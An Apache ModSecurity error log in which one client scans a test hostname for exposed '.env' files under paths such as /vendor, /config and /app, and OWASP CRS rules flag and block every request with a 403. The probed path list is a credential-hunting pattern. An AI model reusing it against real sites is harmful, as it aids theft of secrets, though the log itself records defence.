[Wed Oct 01 08:38:37.437603 2025] [:error] [pid 3143116] [client 56.125.129.157:43652] [client 56.125.129.157] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /vendor/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/vendor/.env"] [unique_id "aNzMbWSEGjAj3vHc8W8gZwAAAAA"], referer: https://www.google.com/
[Wed Oct 01 08:38:37.437873 2025] [:error] [pid 3143116] [client 56.125.129.157:43652] [client 56.125.129.157] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/vendor/.env"] [unique_id "aNzMbWSEGjAj3vHc8W8gZwAAAAA"], referer: https://www.google.com/
[Wed Oct 01 08:38:37.438115 2025] [:error] [pid 3143116] [client 56.125.129.157:43652] [client 56.125.129.157] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/vendor/.env"] [unique_id "aNzMbWSEGjAj3vHc8W8gZwAAAAA"], referer: https://www.google.com/
[Wed Oct 01 08:38:37.897012 2025] [:error] [pid 3143116] [client 56.125.129.157:43652] [client 56.125.129.157] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /lib/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/lib/.env"] [unique_id "aNzMbWSEGjAj3vHc8W8gaAAAAAA"], referer: https://www.google.com/
[Wed Oct 01 08:38:37.897261 2025] [:error] [pid 3143116] [client 56.125.129.157:43652] [client 56.125.129.157] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/lib/.env"] [unique_id "aNzMbWSEGjAj3vHc8W8gaAAAAAA"], referer: https://www.google.com/
[Wed Oct 01 08:38:37.897503 2025] [:error] [pid 3143116] [client 56.125.129.157:43652] [client 56.125.129.157] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/lib/.env"] [unique_id "aNzMbWSEGjAj3vHc8W8gaAAAAAA"], referer: https://www.google.com/
[Wed Oct 01 08:38:38.357187 2025] [:error] [pid 3143116] [client 56.125.129.157:43652] [client 56.125.129.157] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /lab/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/lab/.env"] [unique_id "aNzMbmSEGjAj3vHc8W8gaQAAAAA"], referer: https://www.google.com/
[Wed Oct 01 08:38:38.357503 2025] [:error] [pid 3143116] [client 56.125.129.157:43652] [client 56.125.129.157] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/lab/.env"] [unique_id "aNzMbmSEGjAj3vHc8W8gaQAAAAA"], referer: https://www.google.com/
[Wed Oct 01 08:38:38.357770 2025] [:error] [pid 3143116] [client 56.125.129.157:43652] [client 56.125.129.157] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/lab/.env"] [unique_id "aNzMbmSEGjAj3vHc8W8gaQAAAAA"], referer: https://www.google.com/
[Wed Oct 01 08:38:38.816901 2025] [:error] [pid 3143116] [client 56.125.129.157:43652] [client 56.125.129.157] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cronlab/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/cronlab/.env"] [unique_id "aNzMbmSEGjAj3vHc8W8gagAAAAA"], referer: https://www.google.com/
[Wed Oct 01 08:38:38.817193 2025] [:error] [pid 3143116] [client 56.125.129.157:43652] [client 56.125.129.157] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/cronlab/.env"] [unique_id "aNzMbmSEGjAj3vHc8W8gagAAAAA"], referer: https://www.google.com/
[Wed Oct 01 08:38:38.817906 2025] [:error] [pid 3143116] [client 56.125.129.157:43652] [client 56.125.129.157] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/cronlab/.env"] [unique_id "aNzMbmSEGjAj3vHc8W8gagAAAAA"], referer: https://www.google.com/
[Wed Oct 01 08:38:39.278070 2025] [:error] [pid 3143116] [client 56.125.129.157:43652] [client 56.125.129.157] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cron/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/cron/.env"] [unique_id "aNzMb2SEGjAj3vHc8W8gawAAAAA"], referer: https://www.google.com/
[Wed Oct 01 08:38:39.278501 2025] [:error] [pid 3143116] [client 56.125.129.157:43652] [client 56.125.129.157] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/cron/.env"] [unique_id "aNzMb2SEGjAj3vHc8W8gawAAAAA"], referer: https://www.google.com/
[Wed Oct 01 08:38:39.278761 2025] [:error] [pid 3143116] [client 56.125.129.157:43652] [client 56.125.129.157] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/cron/.env"] [unique_id "aNzMb2SEGjAj3vHc8W8gawAAAAA"], referer: https://www.google.com/
[Wed Oct 01 08:38:39.738033 2025] [:error] [pid 3143116] [client 56.125.129.157:43652] [client 56.125.129.157] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aNzMb2SEGjAj3vHc8W8gbAAAAAA"], referer: https://www.google.com/
[Wed Oct 01 08:38:39.738299 2025] [:error] [pid 3143116] [client 56.125.129.157:43652] [client 56.125.129.157] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aNzMb2SEGjAj3vHc8W8gbAAAAAA"], referer: https://www.google.com/
[Wed Oct 01 08:38:39.738526 2025] [:error] [pid 3143116] [client 56.125.129.157:43652] [client 56.125.129.157] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aNzMb2SEGjAj3vHc8W8gbAAAAAA"], referer: https://www.google.com/
[Wed Oct 01 08:38:40.198136 2025] [:error] [pid 3143116] [client 56.125.129.157:43652] [client 56.125.129.157] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/core/app/.env"] [unique_id "aNzMcGSEGjAj3vHc8W8gbQAAAAA"], referer: https://www.google.com/
[Wed Oct 01 08:38:40.198442 2025] [:error] [pid 3143116] [client 56.125.129.157:43652] [client 56.125.129.157] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/core/app/.env"] [unique_id "aNzMcGSEGjAj3vHc8W8gbQAAAAA"], referer: https://www.google.com/
[Wed Oct 01 08:38:40.198658 2025] [:error] [pid 3143116] [client 56.125.129.157:43652] [client 56.125.129.157] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/core/app/.env"] [unique_id "aNzMcGSEGjAj3vHc8W8gbQAAAAA"], referer: https://www.google.com/
[Wed Oct 01 08:38:40.657964 2025] [:error] [pid 3143116] [client 56.125.129.157:43652] [client 56.125.129.157] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/datavase/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/core/Datavase/.env"] [unique_id "aNzMcGSEGjAj3vHc8W8gbgAAAAA"], referer: https://www.google.com/
[Wed Oct 01 08:38:40.658227 2025] [:error] [pid 3143116] [client 56.125.129.157:43652] [client 56.125.129.157] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/core/Datavase/.env"] [unique_id "aNzMcGSEGjAj3vHc8W8gbgAAAAA"], referer: https://www.google.com/
[Wed Oct 01 08:38:40.658477 2025] [:error] [pid 3143116] [client 56.125.129.157:43652] [client 56.125.129.157] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/core/Datavase/.env"] [unique_id "aNzMcGSEGjAj3vHc8W8gbgAAAAA"], referer: https://www.google.com/
[Wed Oct 01 08:38:41.117521 2025] [:error] [pid 3143116] [client 56.125.129.157:43652] [client 56.125.129.157] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /database/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/database/.env"] [unique_id "aNzMcWSEGjAj3vHc8W8gbwAAAAA"], referer: https://www.google.com/
[Wed Oct 01 08:38:41.117786 2025] [:error] [pid 3143116] [client 56.125.129.157:43652] [client 56.125.129.157] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/database/.env"] [unique_id "aNzMcWSEGjAj3vHc8W8gbwAAAAA"], referer: https://www.google.com/
[Wed Oct 01 08:38:41.118021 2025] [:error] [pid 3143116] [client 56.125.129.157:43652] [client 56.125.129.157] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/database/.env"] [unique_id "aNzMcWSEGjAj3vHc8W8gbwAAAAA"], referer: https://www.google.com/
[Wed Oct 01 08:38:41.578977 2025] [:error] [pid 3143116] [client 56.125.129.157:43652] [client 56.125.129.157] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aNzMcWSEGjAj3vHc8W8gcAAAAAA"], referer: https://www.google.com/
[Wed Oct 01 08:38:41.579230 2025] [:error] [pid 3143116] [client 56.125.129.157:43652] [client 56.125.129.157] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aNzMcWSEGjAj3vHc8W8gcAAAAAA"], referer: https://www.google.com/
[Wed Oct 01 08:38:41.579445 2025] [:error] [pid 3143116] [client 56.125.129.157:43652] [client 56.125.129.157] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aNzMcWSEGjAj3vHc8W8gcAAAAAA"], referer: https://www.google.com/
[Wed Oct 01 08:38:42.038779 2025] [:error] [pid 3143116] [client 56.125.129.157:43652] [client 56.125.129.157] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /assets/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/assets/.env"] [unique_id "aNzMcmSEGjAj3vHc8W8gcQAAAAA"], referer: https://www.google.com/
[Wed Oct 01 08:38:42.039042 2025] [:error] [pid 3143116] [client 56.125.129.157:43652] [client 56.125.129.157] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/assets/.env"] [unique_id "aNzMcmSEGjAj3vHc8W8gcQAAAAA"], referer: https://www.google.com/
[Wed Oct 01 08:38:42.039283 2025] [:error] [pid 3143116] [client 56.125.129.157:43652] [client 56.125.129.157] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/assets/.env"] [unique_id "aNzMcmSEGjAj3vHc8W8gcQAAAAA"], referer: https://www.google.com/
[Wed Oct 01 08:38:42.498999 2025] [:error] [pid 3143116] [client 56.125.129.157:43652] [client 56.125.129.157] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "aNzMcmSEGjAj3vHc8W8gcgAAAAA"], referer: https://www.google.com/
[Wed Oct 01 08:38:42.499357 2025] [:error] [pid 3143116] [client 56.125.129.157:43652] [client 56.125.129.157] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "aNzMcmSEGjAj3vHc8W8gcgAAAAA"], referer: https://www.google.com/
[Wed Oct 01 08:38:42.499655 2025] [:error] [pid 3143116] [client 56.125.129.157:43652] [client 56.125.129.157] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "aNzMcmSEGjAj3vHc8W8gcgAAAAA"], referer: https://www.google.com/
[Wed Oct 01 08:38:42.959330 2025] [:error] [pid 3143116] [client 56.125.129.157:43652] [client 56.125.129.157] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /apps/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "aNzMcmSEGjAj3vHc8W8gcwAAAAA"], referer: https://www.google.com/
[Wed Oct 01 08:38:42.959569 2025] [:error] [pid 3143116] [client 56.125.129.157:43652] [client 56.125.129.157] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "aNzMcmSEGjAj3vHc8W8gcwAAAAA"], referer: https://www.google.com/
[Wed Oct 01 08:38:42.959776 2025] [:error] [pid 3143116] [client 56.125.129.157:43652] [client 56.125.129.157] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "aNzMcmSEGjAj3vHc8W8gcwAAAAA"], referer: https://www.google.com/
